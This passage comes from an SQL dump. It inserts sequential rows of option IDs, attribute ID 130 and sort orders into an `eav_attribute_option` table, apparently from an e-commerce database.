(2440, 130, 2436),
(2441, 130, 2437),
(2442, 130, 2438),
(2443, 130, 2439),
(2444, 130, 2440),
(2445, 130, 2441),
(2446, 130, 2442),
(2447, 130, 2443),
(2448, 130, 2444),
(2449, 130, 2445),
(2450, 130, 2446),
(2451, 130, 2447),
(2452, 130, 2448),
(2453, 130, 2449),
(2454, 130, 2450),
(2455, 130, 2451),
(2456, 130, 2452),
(2457, 130, 2453),
(2458, 130, 2454),
(2459, 130, 2455),
(2460, 130, 2456),
(2461, 130, 2457),
(2462, 130, 2458),
(2463, 130, 2459),
(2464, 130, 2460),
(2465, 130, 2461),
(2466, 130, 2462),
(2467, 130, 2463),
(2468, 130, 2464),
(2469, 130, 2465),
(2470, 130, 2466),
(2471, 130, 2467),
(2472, 130, 2468),
(2473, 130, 2469),
(2474, 130, 2470),
(2475, 130, 2471),
(2476, 130, 2472),
(2477, 130, 2473),
(2478, 130, 2474),
(2479, 130, 2475),
(2480, 130, 2476),
(2481, 130, 2477),
(2482, 130, 2478),
(2483, 130, 2479),
(2484, 130, 2480),
(2485, 130, 2481),
(2486, 130, 2482),
(2487, 130, 2483),
(2488, 130, 2484),
(2489, 130, 2485),
(2490, 130, 2486),
(2491, 130, 2487),
(2492, 130, 2488),
(2493, 130, 2489),
(2494, 130, 2490),
(2495, 130, 2491),
(2496, 130, 2492),
(2497, 130, 2493),
(2498, 130, 2494),
(2499, 130, 2495),
(2500, 130, 2496),
(2501, 130, 2497),
(2502, 130, 2498),
(2503, 130, 2499),
(2504, 130, 2500),
(2505, 130, 2501),
(2506, 130, 2502),
(2507, 130, 2503),
(2508, 130, 2504),
(2509, 130, 2505),
(2510, 130, 2506),
(2511, 130, 2507),
(2512, 130, 2508),
(2513, 130, 2509),
(2514, 130, 2510),
(2515, 130, 2511),
(2516, 130, 2512),
(2517, 130, 2513),
(2518, 130, 2514),
(2519, 130, 2515),
(2520, 130, 2516),
(2521, 130, 2517),
(2522, 130, 2518),
(2523, 130, 2519),
(2524, 130, 2520),
(2525, 130, 2521),
(2526, 130, 2522),
(2527, 130, 2523),
(2528, 130, 2524),
(2529, 130, 2525),
(2530, 130, 2526),
(2531, 130, 2527),
(2532, 130, 2528),
(2533, 130, 2529),
(2534, 130, 2530),
(2535, 130, 2531),
(2536, 130, 2532),
(2537, 130, 2533),
(2538, 130, 2534),
(2539, 130, 2535),
(2540, 130, 2536),
(2541, 130, 2537),
(2542, 130, 2538),
(2543, 130, 2539),
(2544, 130, 2540),
(2545, 130, 2541),
(2546, 130, 2542),
(2547, 130, 2543),
(2548, 130, 2544),
(2549, 130, 2545),
(2550, 130, 2546),
(2551, 130, 2547),
(2552, 130, 2548),
(2553, 130, 2549),
(2554, 130, 2550),
(2555, 130, 2551),
(2556, 130, 2552),
(2557, 130, 2553),
(2558, 130, 2554),
(2559, 130, 2555),
(2560, 130, 2556),
(2561, 130, 2557),
(2562, 130, 2558),
(2563, 130, 2559),
(2564, 130, 2560),
(2565, 130, 2561),
(2566, 130, 2562),
(2567, 130, 2563),
(2568, 130, 2564),
(2569, 130, 2565),
(2570, 130, 2566),
(2571, 130, 2567),
(2572, 130, 2568),
(2573, 130, 2569),
(2574, 130, 2570),
(2575, 130, 2571),
(2576, 130, 2572),
(2577, 130, 2573),
(2578, 130, 2574),
(2579, 130, 2575),
(2580, 130, 2576),
(2581, 130, 2577),
(2582, 130, 2578),
(2583, 130, 2579),
(2584, 130, 2580),
(2585, 130, 2581),
(2586, 130, 2582),
(2587, 130, 2583),
(2588, 130, 2584),
(2589, 130, 2585),
(2590, 130, 2586),
(2591, 130, 2587),
(2592, 130, 2588),
(2593, 130, 2589),
(2594, 130, 2590),
(2595, 130, 2591),
(2596, 130, 2592),
(2597, 130, 2593),
(2598, 130, 2594),
(2599, 130, 2595),
(2600, 130, 2596),
(2601, 130, 2597),
(2602, 130, 2598),
(2603, 130, 2599),
(2604, 130, 2600),
(2605, 130, 2601),
(2606, 130, 2602),
(2607, 130, 2603),
(2608, 130, 2604),
(2609, 130, 2605),
(2610, 130, 2606),
(2611, 130, 2607),
(2612, 130, 2608),
(2613, 130, 2609),
(2614, 130, 2610),
(2615, 130, 2611),
(2616, 130, 2612),
(2617, 130, 2613),
(2618, 130, 2614),
(2619, 130, 2615),
(2620, 130, 2616),
(2621, 130, 2617),
(2622, 130, 2618),
(2623, 130, 2619),
(2624, 130, 2620),
(2625, 130, 2621),
(2626, 130, 2622),
(2627, 130, 2623),
(2628, 130, 2624),
(2629, 130, 2625),
(2630, 130, 2626),
(2631, 130, 2627),
(2632, 130, 2628),
(2633, 130, 2629),
(2634, 130, 2630),
(2635, 130, 2631),
(2636, 130, 2632),
(2637, 130, 2633),
(2638, 130, 2634),
(2639, 130, 2635),
(2640, 130, 2636),
(2641, 130, 2637),
(2642, 130, 2638),
(2643, 130, 2639),
(2644, 130, 2640),
(2645, 130, 2641),
(2646, 130, 2642),
(2647, 130, 2643),
(2648, 130, 2644),
(2649, 130, 2645),
(2650, 130, 2646),
(2651, 130, 2647),
(2652, 130, 2648),
(2653, 130, 2649),
(2654, 130, 2650),
(2655, 130, 2651),
(2656, 130, 2652),
(2657, 130, 2653),
(2658, 130, 2654),
(2659, 130, 2655),
(2660, 130, 2656),
(2661, 130, 2657),
(2662, 130, 2658),
(2663, 130, 2659),
(2664, 130, 2660),
(2665, 130, 2661),
(2666, 130, 2662),
(2667, 130, 2663),
(2668, 130, 2664),
(2669, 130, 2665),
(2670, 130, 2666),
(2671, 130, 2667),
(2672, 130, 2668),
(2673, 130, 2669),
(2674, 130, 2670),
(2675, 130, 2671),
(2676, 130, 2672),
(2677, 130, 2673),
(2678, 130, 2674),
(2679, 130, 2675),
(2680, 130, 2676),
(2681, 130, 2677),
(2682, 130, 2678),
(2683, 130, 2679),
(2684, 130, 2680),
(2685, 130, 2681),
(2686, 130, 2682),
(2687, 130, 2683),
(2688, 130, 2684),
(2689, 130, 2685),
(2690, 130, 2686),
(2691, 130, 2687),
(2692, 130, 2688),
(2693, 130, 2689),
(2694, 130, 2690),
(2695, 130, 2691),
(2696, 130, 2692),
(2697, 130, 2693),
(2698, 130, 2694),
(2699, 130, 2695),
(2700, 130, 2696),
(2701, 130, 2697),
(2702, 130, 2698),
(2703, 130, 2699),
(2704, 130, 2700),
(2705, 130, 2701),
(2706, 130, 2702),
(2707, 130, 2703),
(2708, 130, 2704),
(2709, 130, 2705),
(2710, 130, 2706),
(2711, 130, 2707),
(2712, 130, 2708),
(2713, 130, 2709),
(2714, 130, 2710),
(2715, 130, 2711),
(2716, 130, 2712),
(2717, 130, 2713),
(2718, 130, 2714),
(2719, 130, 2715),
(2720, 130, 2716),
(2721, 130, 2717),
(2722, 130, 2718),
(2723, 130, 2719),
(2724, 130, 2720),
(2725, 130, 2721),
(2726, 130, 2722),
(2727, 130, 2723),
(2728, 130, 2724),
(2729, 130, 2725),
(2730, 130, 2726),
(2731, 130, 2727),
(2732, 130, 2728),
(2733, 130, 2729),
(2734, 130, 2730),
(2735, 130, 2731),
(2736, 130, 2732),
(2737, 130, 2733),
(2738, 130, 2734),
(2739, 130, 2735),
(2740, 130, 2736),
(2741, 130, 2737),
(2742, 130, 2738),
(2743, 130, 2739),
(2744, 130, 2740),
(2745, 130, 2741),
(2746, 130, 2742),
(2747, 130, 2743),
(2748, 130, 2744),
(2749, 130, 2745),
(2750, 130, 2746),
(2751, 130, 2747),
(2752, 130, 2748),
(2753, 130, 2749),
(2754, 130, 2750),
(2755, 130, 2751),
(2756, 130, 2752),
(2757, 130, 2753),
(2758, 130, 2754),
(2759, 130, 2755),
(2760, 130, 2756),
(2761, 130, 2757),
(2762, 130, 2758),
(2763, 130, 2759),
(2764, 130, 2760),
(2765, 130, 2761),
(2766, 130, 2762),
(2767, 130, 2763),
(2768, 130, 2764),
(2769, 130, 2765),
(2770, 130, 2766),
(2771, 130, 2767),
(2772, 130, 2768),
(2773, 130, 2769),
(2774, 130, 2770),
(2775, 130, 2771),
(2776, 130, 2772),
(2777, 130, 2773),
(2778, 130, 2774),
(2779, 130, 2775),
(2780, 130, 2776),
(2781, 130, 2777),
(2782, 130, 2778),
(2783, 130, 2779),
(2784, 130, 2780),
(2785, 130, 2781),
(2786, 130, 2782),
(2787, 130, 2783),
(2788, 130, 2784),
(2789, 130, 2785),
(2790, 130, 2786),
(2791, 130, 2787),
(2792, 130, 2788),
(2793, 130, 2789),
(2794, 130, 2790),
(2795, 130, 2791),
(2796, 130, 2792),
(2797, 130, 2793),
(2798, 130, 2794),
(2799, 130, 2795),
(2800, 130, 2796),
(2801, 130, 2797),
(2802, 130, 2798),
(2803, 130, 2799),
(2804, 130, 2800),
(2805, 130, 2801),
(2806, 130, 2802),
(2807, 130, 2803),
(2808, 130, 2804),
(2809, 130, 2805),
(2810, 130, 2806),
(2811, 130, 2807),
(2812, 130, 2808),
(2813, 130, 2809),
(2814, 130, 2810),
(2815, 130, 2811),
(2816, 130, 2812),
(2817, 130, 2813),
(2818, 130, 2814),
(2819, 130, 2815),
(2820, 130, 2816),
(2821, 130, 2817),
(2822, 130, 2818),
(2823, 130, 2819),
(2824, 130, 2820),
(2825, 130, 2821),
(2826, 130, 2822),
(2827, 130, 2823),
(2828, 130, 2824),
(2829, 130, 2825),
(2830, 130, 2826),
(2831, 130, 2827),
(2832, 130, 2828),
(2833, 130, 2829),
(2834, 130, 2830),
(2835, 130, 2831),
(2836, 130, 2832),
(2837, 130, 2833),
(2838, 130, 2834),
(2839, 130, 2835),
(2840, 130, 2836),
(2841, 130, 2837),
(2842, 130, 2838),
(2843, 130, 2839),
(2844, 130, 2840),
(2845, 130, 2841),
(2846, 130, 2842),
(2847, 130, 2843),
(2848, 130, 2844),
(2849, 130, 2845),
(2850, 130, 2846),
(2851, 130, 2847),
(2852, 130, 2848),
(2853, 130, 2849),
(2854, 130, 2850),
(2855, 130, 2851),
(2856, 130, 2852),
(2857, 130, 2853),
(2858, 130, 2854),
(2859, 130, 2855),
(2860, 130, 2856),
(2861, 130, 2857),
(2862, 130, 2858),
(2863, 130, 2859),
(2864, 130, 2860),
(2865, 130, 2861),
(2866, 130, 2862),
(2867, 130, 2863),
(2868, 130, 2864),
(2869, 130, 2865),
(2870, 130, 2866),
(2871, 130, 2867),
(2872, 130, 2868),
(2873, 130, 2869),
(2874, 130, 2870),
(2875, 130, 2871),
(2876, 130, 2872),
(2877, 130, 2873),
(2878, 130, 2874),
(2879, 130, 2875),
(2880, 130, 2876),
(2881, 130, 2877),
(2882, 130, 2878),
(2883, 130, 2879),
(2884, 130, 2880),
(2885, 130, 2881),
(2886, 130, 2882),
(2887, 130, 2883),
(2888, 130, 2884),
(2889, 130, 2885),
(2890, 130, 2886),
(2891, 130, 2887),
(2892, 130, 2888),
(2893, 130, 2889),
(2894, 130, 2890),
(2895, 130, 2891),
(2896, 130, 2892),
(2897, 130, 2893),
(2898, 130, 2894),
(2899, 130, 2895),
(2900, 130, 2896),
(2901, 130, 2897),
(2902, 130, 2898),
(2903, 130, 2899),
(2904, 130, 2900),
(2905, 130, 2901),
(2906, 130, 2902),
(2907, 130, 2903),
(2908, 130, 2904),
(2909, 130, 2905),
(2910, 130, 2906),
(2911, 130, 2907),
(2912, 130, 2908),
(2913, 130, 2909),
(2914, 130, 2910),
(2915, 130, 2911),
(2916, 130, 2912),
(2917, 130, 2913),
(2918, 130, 2914),
(2919, 130, 2915),
(2920, 130, 2916),
(2921, 130, 2917),
(2922, 130, 2918),
(2923, 130, 2919),
(2924, 130, 2920),
(2925, 130, 2921),
(2926, 130, 2922),
(2927, 130, 2923),
(2928, 130, 2924),
(2929, 130, 2925),
(2930, 130, 2926),
(2931, 130, 2927),
(2932, 130, 2928),
(2933, 130, 2929),
(2934, 130, 2930),
(2935, 130, 2931),
(2936, 130, 2932),
(2937, 130, 2933),
(2938, 130, 2934),
(2939, 130, 2935),
(2940, 130, 2936),
(2941, 130, 2937),
(2942, 130, 2938),
(2943, 130, 2939),
(2944, 130, 2940),
(2945, 130, 2941),
(2946, 130, 2942),
(2947, 130, 2943),
(2948, 130, 2944),
(2949, 130, 2945),
(2950, 130, 2946),
(2951, 130, 2947),
(2952, 130, 2948),
(2953, 130, 2949),
(2954, 130, 2950),
(2955, 130, 2951),
(2956, 130, 2952),
(2957, 130, 2953),
(2958, 130, 2954),
(2959, 130, 2955),
(2960, 130, 2956),
(2961, 130, 2957),
(2962, 130, 2958),
(2963, 130, 2959),
(2964, 130, 2960),
(2965, 130, 2961),
(2966, 130, 2962),
(2967, 130, 2963),
(2968, 130, 2964),
(2969, 130, 2965),
(2970, 130, 2966),
(2971, 130, 2967),
(2972, 130, 2968),
(2973, 130, 2969),
(2974, 130, 2970),
(2975, 130, 2971),
(2976, 130, 2972),
(2977, 130, 2973),
(2978, 130, 2974),
(2979, 130, 2975),
(2980, 130, 2976),
(2981, 130, 2977),
(2982, 130, 2978),
(2983, 130, 2979),
(2984, 130, 2980),
(2985, 130, 2981),
(2986, 130, 2982),
(2987, 130, 2983),
(2988, 130, 2984),
(2989, 130, 2985),
(2990, 130, 2986),
(2991, 130, 2987),
(2992, 130, 2988),
(2993, 130, 2989),
(2994, 130, 2990),
(2995, 130, 2991),
(2996, 130, 2992),
(2997, 130, 2993),
(2998, 130, 2994),
(2999, 130, 2995),
(3000, 130, 2996),
(3001, 130, 2997),
(3002, 130, 2998),
(3003, 130, 2999),
(3004, 130, 3000),
(3005, 130, 3001),
(3006, 130, 3002),
(3007, 130, 3003),
(3008, 130, 3004),
(3009, 130, 3005),
(3010, 130, 3006),
(3011, 130, 3007),
(3012, 130, 3008),
(3013, 130, 3009),
(3014, 130, 3010),
(3015, 130, 3011),
(3016, 130, 3012),
(3017, 130, 3013),
(3018, 130, 3014),
(3019, 130, 3015),
(3020, 130, 3016),
(3021, 130, 3017),
(3022, 130, 3018),
(3023, 130, 3019),
(3024, 130, 3020),
(3025, 130, 3021),
(3026, 130, 3022),
(3027, 130, 3023),
(3028, 130, 3024),
(3029, 130, 3025),
(3030, 130, 3026),
(3031, 130, 3027),
(3032, 130, 3028),
(3033, 130, 3029),
(3034, 130, 3030),
(3035, 130, 3031),
(3036, 130, 3032),
(3037, 130, 3033),
(3038, 130, 3034),
(3039, 130, 3035),
(3040, 130, 3036),
(3041, 130, 3037),
(3042, 130, 3038),
(3043, 130, 3039),
(3044, 130, 3040),
(3045, 130, 3041),
(3046, 130, 3042),
(3047, 130, 3043),
(3048, 130, 3044),
(3049, 130, 3045),
(3050, 130, 3046),
(3051, 130, 3047),
(3052, 130, 3048),
(3053, 130, 3049),
(3054, 130, 3050),
(3055, 130, 3051),
(3056, 130, 3052),
(3057, 130, 3053),
(3058, 130, 3054),
(3059, 130, 3055),
(3060, 130, 3056),
(3061, 130, 3057),
(3062, 130, 3058),
(3063, 130, 3059),
(3064, 130, 3060),
(3065, 130, 3061),
(3066, 130, 3062),
(3067, 130, 3063);
INSERT INTO `eav_attribute_option` (`option_id`, `attribute_id`, `sort_order`) VALUES
(3068, 130, 3064),
(3069, 130, 3065),
(3070, 130, 3066),
(3071, 130, 3067),
(3072, 130, 3068),
(3073, 130, 3069),
(3074, 130, 3070),
(3075, 130, 3071),
(3076, 130, 3072),
(3077, 130, 3073),
(3078, 130, 3074),
(3079, 130, 3075),
(3080, 130, 3076),
(3081, 130, 3077),
(3082, 130, 3078),
(3083, 130, 3079),
(3084, 130, 3080),
(3085, 130, 3081),
(3086, 130, 3082),
(3087, 130, 3083),
(3088, 130, 3084),
(3089, 130, 3085),
(3090, 130, 3086),
(3091, 130, 3087),
(3092, 130, 3088),
(3093, 130, 3089),
(3094, 130, 3090),
(3095, 130, 3091),
(3096, 130, 3092),
(3097, 130, 3093),
(3098, 130, 3094),
(3099, 130, 3095),
(3100, 130, 3096),
(3101, 130, 3097),
(3102, 130, 3098),
(3103, 130, 3099),
(3104, 130, 3100),
(3105, 130, 3101),
(3106, 130, 3102),
(3107, 130, 3103),
(3108, 130, 3104),
(3109, 130, 3105),
(3110, 130, 3106),
(3111, 130, 3107),
(3112, 130, 3108),
(3113, 130, 3109),
(3114, 130, 3110),
(3115, 130, 3111),
(3116, 130, 3112),
(3117, 130, 3113),
(3118, 130, 3114),
(3119, 130, 3115),
(3120, 130, 3116),
(3121, 130, 3117),
(3122, 130, 3118),
(3123, 130, 3119),
(3124, 130, 3120),
(3125, 130, 3121),
(3126, 130, 3122),
(3127, 130, 3123),
(3128, 130, 3124),
(3129, 130, 3125),
(3130, 130, 3126),
(3131, 130, 3127),
(3132, 130, 3128),
(3133, 130, 3129),
(3134, 130, 3130),
(3135, 130, 3131),
(3136, 130, 3132),
(3137, 130, 3133),
(3138, 130, 3134),
(3139, 130, 3135),
(3140, 130, 3136),
(3141, 130, 3137),
(3142, 130, 3138),
(3143, 130, 3139),
(3144, 130, 3140),
(3145, 130, 3141),
(3146, 130, 3142),
(3147, 130, 3143),
(3148, 130, 3144),
(3149, 130, 3145),
(3150, 130, 3146),
(3151, 130, 3147),
(3152, 130, 3148),
(3153, 130, 3149),
(3154, 130, 3150),
(3155, 130, 3151),
(3156, 130, 3152),
(3157, 130, 3153),
(3158, 130, 3154),
(3159, 130, 3155),
(3160, 130, 3156),
(3161, 130, 3157),
(3162, 130, 3158),
(3163, 130, 3159),
(3164, 130, 3160),
(3165, 130, 3161),
(3166, 130, 3162),
(3167, 130, 3163),
(3168, 130, 3164),
(3169, 130, 3165),
(3170, 130, 3166),
(3171, 130, 3167),
(3172, 130, 3168),
(3173, 130, 3169),
(3174, 130, 3170),
(3175, 130, 3171),
(3176, 130, 3172),
(3177, 130, 3173),
(3178, 130, 3174),
(3179, 130, 3175),
(3180, 130, 3176),
(3181, 130, 3177),
(3182, 130, 3178),
(3183, 130, 3179),
(3184, 130, 3180),
(3185, 130, 3181),
(3186, 130, 3182),
(3187, 130, 3183),
(3188, 130, 3184),
(3189, 130, 3185),
(3190, 130, 3186),
(3191, 130, 3187),
(3192, 130, 3188),
(3193, 130, 3189),
(3194, 130, 3190),
(3195, 130, 3191),
(3196, 130, 3192),
(3197, 130, 3193),
(3198, 130, 3194),
(3199, 130, 3195),
(3200, 130, 3196),
(3201, 130, 3197),
(3202, 130, 3198),
(3203, 130, 3199),
(3204, 130, 3200),
(3205, 130, 3201),
(3206, 130, 3202),
(3207, 130, 3203),
(3208, 130, 3204),
(3209, 130, 3205),
(3210, 130, 3206),
(3211, 130, 3207),
(3212, 130, 3208),
(3213, 130, 3209),
(3214, 130, 3210),
(3215, 130, 3211),
(3216, 130, 3212),
(3217, 130, 3213),
(3218, 130, 3214),
(3219, 130, 3215),
(3220, 130, 3216),
(3221, 130, 3217),
(3222, 130, 3218),
(3223, 130, 3219),
(3224, 130, 3220),
(3225, 130, 3221),
(3226, 130, 3222),
(3227, 130, 3223),
(3228, 130, 3224),
(3229, 130, 3225),
(3230, 130, 3226),
(3231, 130, 3227),
(3232, 130, 3228),
(3233, 130, 3229),
(3234, 130, 3230),
(3235, 130, 3231),
(3236, 130, 3232),
(3237, 130, 3233),
(3238, 130, 3234),
(3239, 130, 3235),
(3240, 130, 3236),
(3241, 130, 3237),
(3242, 130, 3238),
(3243, 130, 3239),
(3244, 130, 3240),
(3245, 130, 3241),
(3246, 130, 3242),
(3247, 130, 3243),
(3248, 130, 3244),
(3249, 130, 3245),
(3250, 130, 3246),
(3251, 130, 3247),
(3252, 130, 3248),
(3253, 130, 3249),
(3254, 130, 3250),
(3255, 130, 3251),
(3256, 130, 3252),
(3257, 130, 3253),
(3258, 130, 3254),
(3259, 130, 3255),
(3260, 130, 3256),
(3261, 130, 3257),
(3262, 130, 3258),
(3263, 130, 3259),
(3264, 130, 3260),
(3265, 130, 3261),
(3266, 130, 3262),
(3267, 130, 3263),
(3268, 130, 3264),
(3269, 130, 3265),
(3270, 130, 3266),
(3271, 130, 3267),
(3272, 130, 3268),
(3273, 130, 3269),
(3274, 130, 3270),
(3275, 130, 3271),
(3276, 130, 3272),
(3277, 130, 3273),
(3278, 130, 3274),
(3279, 130, 3275),
(3280, 130, 3276),
(3281, 130, 3277),
(3282, 130, 3278),
(3283, 130, 3279),
(3284, 130, 3280),
(3285, 130, 3281),
(3286, 130, 3282),
(3287, 130, 3283),
(3288, 130, 3284),
(3289, 130, 3285),
(3290, 130, 3286),
(3291, 130, 3287),
(3292, 130, 3288),
(3293, 130, 3289),
(3294, 130, 3290),
(3295, 130, 3291),
(3296, 130, 3292),
(3297, 130, 3293),
(3298, 130, 3294),
(3299, 130, 3295),
(3300, 130, 3296),
(3301, 130, 3297),
(3302, 130, 3298),
(3303, 130, 3299),
(3304, 130, 3300),
(3305, 130, 3301),
(3306, 130, 3302),
(3307, 130, 3303),
(3308, 130, 3304),
(3309, 130, 3305),
(3310, 130, 3306),
(3311, 130, 3307),
(3312, 130, 3308),
(3313, 130, 3309),
(3314, 130, 3310),
(3315, 130, 3311),
(3316, 130, 3312),
(3317, 130, 3313),
(3318, 130, 3314),
(3319, 130, 3315),
(3320, 130, 3316),
(3321, 130, 3317),
(3322, 130, 3318),
(3323, 130, 3319),
(3324, 130, 3320),
(3325, 130, 3321),
(3326, 130, 3322),
(3327, 130, 3323),
(3328, 130, 3324),
(3329, 130, 3325),
(3330, 130, 3326),
(3331, 130, 3327),
(3332, 130, 3328),
(3333, 130, 3329),
(3334, 130, 3330),
(3335, 130, 3331),
(3336, 130, 3332),
(3337, 130, 3333),
(3338, 130, 3334),
(3339, 130, 3335),
(3340, 130, 3336),
(3341, 130, 3337),
(3342, 130, 3338),
(3343, 130, 3339),
(3344, 130, 3340),
(3345, 130, 3341),
(3346, 130, 3342),
(3347, 130, 3343),
(3348, 130, 3344),
(3349, 130, 3345),
(3350, 130, 3346),
(3351, 130, 3347),
(3352, 130, 3348),
(3353, 130, 3349),
(3354, 130, 3350),
(3355, 130, 3351),
(3356, 130, 3352),
(3357, 130, 3353),
(3358, 130, 3354),
(3359, 130, 3355),
(3360, 130, 3356),
(3361, 130, 3357),
(3362, 130, 3358),
(3363, 130, 3359),
(3364, 130, 3360),
(3365, 130, 3361),
(3366, 130, 3362),
(3367, 130, 3363),
(3368, 130, 3364),
(3369, 130, 3365),
(3370, 130, 3366),
(3371, 130, 3367),
(3372, 130, 3368),
(3373, 130, 3369),
(3374, 130, 3370),
(3375, 130, 3371),
(3376, 130, 3372),
(3377, 130, 3373),
(3378, 130, 3374),
(3379, 130, 3375),
(3380, 130, 3376),
(3381, 130, 3377),
(3382, 130, 3378),
(3383, 130, 3379),
(3384, 130, 3380),
(3385, 130, 3381),
(3386, 130, 3382),
(3387, 130, 3383),
(3388, 130, 3384),
(3389, 130, 3385),
(3390, 130, 3386),
(3391, 130, 3387),
(3392, 130, 3388),
(3393, 130, 3389),
(3394, 130, 3390),
(3395, 130, 3391),
(3396, 130, 3392),
(3397, 130, 3393),
(3398, 130, 3394),
(3399, 130, 3395),
(3400, 130, 3396),
(3401, 130, 3397),
(3402, 130, 3398),
(3403, 130, 3399),
(3404, 130, 3400),
(3405, 130, 3401),
(3406, 130, 3402),
(3407, 130, 3403),
(3408, 130, 3404),
(3409, 130, 3405),
(3410, 130, 3406),
(3411, 130, 3407),
(3412, 130, 3408),
(3413, 130, 3409),
(3414, 130, 3410),
(3415, 130, 3411),
(3416, 130, 3412),
(3417, 130, 3413),
(3418, 130, 3414),
(3419, 130, 3415),
(3420, 130, 3416),
(3421, 130, 3417),
(3422, 130, 3418),
(3423, 130, 3419),
(3424, 130, 3420),
(3425, 130, 3421),
(3426, 130, 3422),
(3427, 130, 3423),
(3428, 130, 3424),
(3429, 130, 3425),
(3430, 130, 3426),
(3431, 130, 3427),
(3432, 130, 3428),
(3433, 130, 3429),
(3434, 130, 3430),
(3435, 130, 3431),
(3436, 130, 3432),
(3437, 130, 3433),
(3438, 130, 3434),
(3439, 130, 3435),
(3440, 130, 3436),
(3441, 130, 3437),
(3442, 130, 3438),
(3443, 130, 3439),
(3444, 130, 3440),
(3445, 130, 3441),
(3446, 130, 3442),
(3447, 130, 3443),
(3448, 130, 3444),
(3449, 130, 3445),
(3450, 130, 3446),
(3451, 130, 3447),
(3452, 130, 3448),
(3453, 130, 3449),
(3454, 130, 3450),
(3455, 130, 3451),
(3456, 130, 3452),
(3457, 130, 3453),
(3458, 130, 3454),
(3459, 130, 3455),
(3460, 130, 3456),
(3461, 130, 3457),
(3462, 130, 3458),
(3463, 130, 3459),
(3464, 130, 3460),
(3465, 130, 3461),
(3466, 130, 3462),
(3467, 130, 3463),
(3468, 130, 3464),
(3469, 130, 3465),
(3470, 130, 3466),
(3471, 130, 3467),
(3472, 130, 3468),
(3473, 130, 3469),
(3474, 130, 3470),
(3475, 130, 3471),
(3476, 130, 3472),
(3477, 130, 3473),
(3478, 130, 3474),
(3479, 130, 3475),
(3480, 130, 3476),
(3481, 130, 3477),
(3482, 130, 3478),
(3483, 130, 3479),
(3484, 130, 3480),
(3485, 130, 3481),
(3486, 130, 3482),
(3487, 130, 3483),
(3488, 130, 3484),
(3489, 130, 3485),
(3490, 130, 3486),
(3491, 130, 3487),
(3492, 130, 3488),
(3493, 130, 3489),
(3494, 130, 3490),
(3495, 130, 3491),
(3496, 130, 3492),
(3497, 130, 3493),
(3498, 130, 3494),
(3499, 130, 3495),
(3500, 130, 3496),
(3501, 130, 3497),
(3502, 130, 3498),
(3503, 130, 3499),
(3504, 130, 3500),
(3505, 130, 3501),
(3506, 130, 3502),
(3507, 130, 3503),
(3508, 130, 3504),
(3509, 130, 3505),
(3510, 130, 3506),
(3511, 130, 3507),
(3512, 130, 3508),
(3513, 130, 3509),
(3514, 130, 3510),
(3515, 130, 3511),
(3516, 130, 3512),
(3517, 130, 3513),
(3518, 130, 3514),
(3519, 130, 3515),
(3520, 130, 3516),
(3521, 130, 3517),
(3522, 130, 3518),
(3523, 130, 3519),
(3524, 130, 3520),
(3525, 130, 3521),
(3526, 130, 3522),
(3527, 130, 3523),
(3528, 130, 3524),
(3529, 130, 3525),
(3530, 130, 3526),
(3531, 130, 3527),
(3532, 130, 3528),
(3533, 130, 3529),
(3534, 130, 3530),
(3535, 130, 3531),
(3536, 130, 3532),
(3537, 130, 3533),
(3538, 130, 3534),
(3539, 130, 3535),
(3540, 130, 3536),
(3541, 130, 3537),
(3542, 130, 3538),
(3543, 130, 3539),
(3544, 130, 3540),
(3545, 130, 3541),
(3546, 130, 3542),
(3547, 130, 3543),
(3548, 130, 3544),
(3549, 130, 3545),
(3550, 130, 3546),
(3551, 130, 3547),
(3552, 130, 3548),
(3553, 130, 3549),
(3554, 130, 3550),
(3555, 130, 3551),
(3556, 130, 3552),
(3557, 130, 3553),
(3558, 130, 3554),
(3559, 130, 3555),
(3560, 130, 3556),
(3561, 130, 3557),
(3562, 130, 3558),
(3563, 130, 3559),
(3564, 130, 3560),
(3565, 130, 3561),
(3566, 130, 3562),
(3567, 130, 3563),
(3568, 130, 3564),
(3569, 130, 3565),
(3570, 130, 3566),
(3571, 130, 3567),
(3572, 130, 3568),
(3573, 130, 3569),
(3574, 130, 3570),
(3575, 130, 3571),
(3576, 130, 3572),
(3577, 130, 3573),
(3578, 130, 3574),
(3579, 130, 3575),
(3580, 130, 3576),
(3581, 130, 3577),
(3582, 130, 3578),
(3583, 130, 3579),
(3584, 130, 3580),
(3585, 130, 3581),
(3586, 130, 3582),
(3587, 130, 3583),
(3588, 130, 3584),
(3589, 130, 3585),
(3590, 130, 3586),
(3591, 130, 3587),
(3592, 130, 3588),
(3593, 130, 3589),
(3594, 130, 3590),
(3595, 130, 3591),
(3596, 130, 3592),
(3597, 130, 3593),
(3598, 130, 3594),
(3599, 130, 3595),
(3600, 130, 3596),
(3601, 130, 3597),
(3602, 130, 3598),
(3603, 130, 3599),
(3604, 130, 3600),
(3605, 130, 3601),
(3606, 130, 3602),
(3607, 130, 3603),
(3608, 130, 3604),
(3609, 130, 3605),
(3610, 130, 3606),
(3611, 130, 3607),
(3612, 130, 3608),
(3613, 130, 3609),
(3614, 130, 3610),
(3615, 130, 3611),
(3616, 130, 3612),
(3617, 130, 3613),
(3618, 130, 3614),
(3619, 130, 3615),
(3620, 130, 3616),
(3621, 130, 3617),
(3622, 130, 3618),
(3623, 130, 3619),
(3624, 130, 3620),
(3625, 130, 3621),
(3626, 130, 3622),
(3627, 130, 3623),
(3628, 130, 3624),
(3629, 130, 3625),
(3630, 130, 3626),
(3631, 130, 3627),
(3632, 130, 3628),
(3633, 130, 3629),
(3634, 130, 3630),
(3635, 130, 3631),
(3636, 130, 3632),
(3637, 130, 3633),
(3638, 130, 3634),
(3639, 130, 3635),
(3640, 130, 3636),
(3641, 130, 3637),
(3642, 130, 3638),
(3643, 130, 3639),
(3644, 130, 3640),
(3645, 130, 3641),
(3646, 130, 3642),
(3647, 130, 3643),
(3648, 130, 3644),
(3649, 130, 3645),
(3650, 130, 3646),
(3651, 130, 3647),
(3652, 130, 3648),
(3653, 130, 3649),
(3654, 130, 3650),
(3655, 130, 3651),
(3656, 130, 3652),
(3657, 130, 3653),
(3658, 130, 3654),
(3659, 130, 3655),
(3660, 130, 3656),
(3661, 130, 3657),
(3662, 130, 3658),
(3663, 130, 3659),
(3664, 130, 3660),
(3665, 130, 3661),
(3666, 130, 3662),
(3667, 130, 3663),
(3668, 130, 3664),
(3669, 130, 3665),
(3670, 130, 3666),
(3671, 130, 3667),
(3672, 130, 3668),
(3673, 130, 3669),
(3674, 130, 3670),
(3675, 130, 3671),
(3676, 130, 3672),
(3677, 130, 3673),
(3678, 130, 3674),
(3679, 130, 3675),
(3680, 130, 3676),
(3681, 130, 3677),
(3682, 130, 3678),
(3683, 130, 3679),
(3684, 130, 3680),
(3685, 130, 3681),
